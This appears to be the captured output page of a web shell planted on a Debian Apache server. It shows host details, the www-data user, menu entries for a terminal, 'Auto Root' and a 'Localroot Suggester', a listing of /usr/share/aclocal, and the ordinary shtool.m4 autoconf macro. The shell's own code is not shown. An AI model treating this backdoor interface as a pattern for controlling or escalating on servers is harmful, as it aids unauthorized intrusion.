Linux vmi2545633.contaboserver.net 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64
Apache/2.4.62 (Debian)
Server IP : 127.0.0.1 & Your IP : 127.0.0.1
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
aclocal /
Delete
Unzip
Name
Size
Permission
Date
Action
expat.m4
1.41
KB
-rw-r--r--
2022-10-25 15:08
gettext.m4
14.15
KB
-rw-r--r--
2023-02-26 15:20
host-cpu-c-abi.m4
21.91
KB
-rw-r--r--
2023-02-26 15:20
iconv.m4
9.5
KB
-rw-r--r--
2023-02-26 15:20
intlmacosx.m4
3.15
KB
-rw-r--r--
2023-02-26 15:20
lib-ld.m4
5.24
KB
-rw-r--r--
2023-02-26 15:20
lib-link.m4
33.99
KB
-rw-r--r--
2023-02-26 15:20
lib-prefix.m4
11.66
KB
-rw-r--r--
2023-02-26 15:20
libtool.m4
300.92
KB
-rw-r--r--
2024-04-09 20:04
ltargz.m4
2.61
KB
-rw-r--r--
2024-04-09 20:04
ltdl.m4
29.37
KB
-rw-r--r--
2024-04-09 20:04
ltoptions.m4
14.18
KB
-rw-r--r--
2024-04-09 20:04
ltsugar.m4
4.29
KB
-rw-r--r--
2024-04-09 20:04
ltversion.m4
714
B
-rw-r--r--
2024-04-09 20:04
lt~obsolete.m4
6.01
KB
-rw-r--r--
2024-04-09 20:04
nls.m4
1.21
KB
-rw-r--r--
2023-02-26 15:20
pkg.m4
12.44
KB
-rw-r--r--
2023-01-22 11:06
po.m4
18.39
KB
-rw-r--r--
2023-02-26 15:20
progtest.m4
3.02
KB
-rw-r--r--
2023-02-26 15:20
shtool.m4
2.05
KB
-rw-r--r--
2019-12-23 21:26
Save
Rename
## ## shtool.m4 -- GNU shtool Autoconf macros ## Copyright (c) 1999-2008 Ralf S. Engelschall <rse@engelschall.com> ## ## This file is part of shtool and free software; you can redistribute ## it and/or modify it under the terms of the GNU General Public ## License as published by the Free Software Foundation; either version ## 2 of the License, or (at your option) any later version. ## ## This file is distributed in the hope that it will be useful, ## but WITHOUT ANY WARRANTY; without even the implied warranty of ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ## General Public License for more details. ## ## You should have received a copy of the GNU General Public License ## along with this program; if not, write to the Free Software ## Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, ## USA, or contact Ralf S. Engelschall <rse@engelschall.com>. ## ## ## the standard macro for finding GNU shtool: ## AC_PROG_SHTOOL ## AC_DEFUN([AC_PROG_SHTOOL],[dnl AC_PREREQ(2.13)dnl AC_MSG_CHECKING([for GNU shtool]) AC_CACHE_VAL(ac_cv_shtool,[dnl # canonicalize and split path string ac_paths="`echo .:$ac_aux_dir:$PATH |\ sed -e 's%/*:%:%g' -e 's%/*$%%' \ -e 's/^:/.:/' -e 's/::/:.:/g' -e 's/:$/:./' \ -e 's/:/ /g'`" # iterate over $PATH but prefer CWD ac_cv_shtool="" for ac_path in $ac_paths; do if test -f "$ac_path/shtool" && test ! -d "$ac_path/shtool"; then ac_cv_shtool="$ac_path/shtool" break fi done # check for existance if test ".$ac_cv_shtool" = .; then AC_MSG_ERROR([no shtool found in .:$PATH]) fi # check deeper ac_rc=`($ac_cv_shtool --version) </dev/null 2>/dev/null | grep 'GNU shtool'` if test ".$ac_rc" = .; then ac_cv_shtool="${CONFIG_SHELL-/bin/sh} $ac_cv_shtool" ac_rc=`($ac_cv_shtool --version) </dev/null 2>/dev/null | grep 'GNU shtool'` if test ".$ac_rc" = .; then AC_MSG_ERROR([$ac_cv_shtool seems not to be GNU shtool]) fi fi ])dnl AC_MSG_RESULT([$ac_cv_shtool]) SHTOOL="$ac_cv_shtool" AC_SUBST(SHTOOL) ])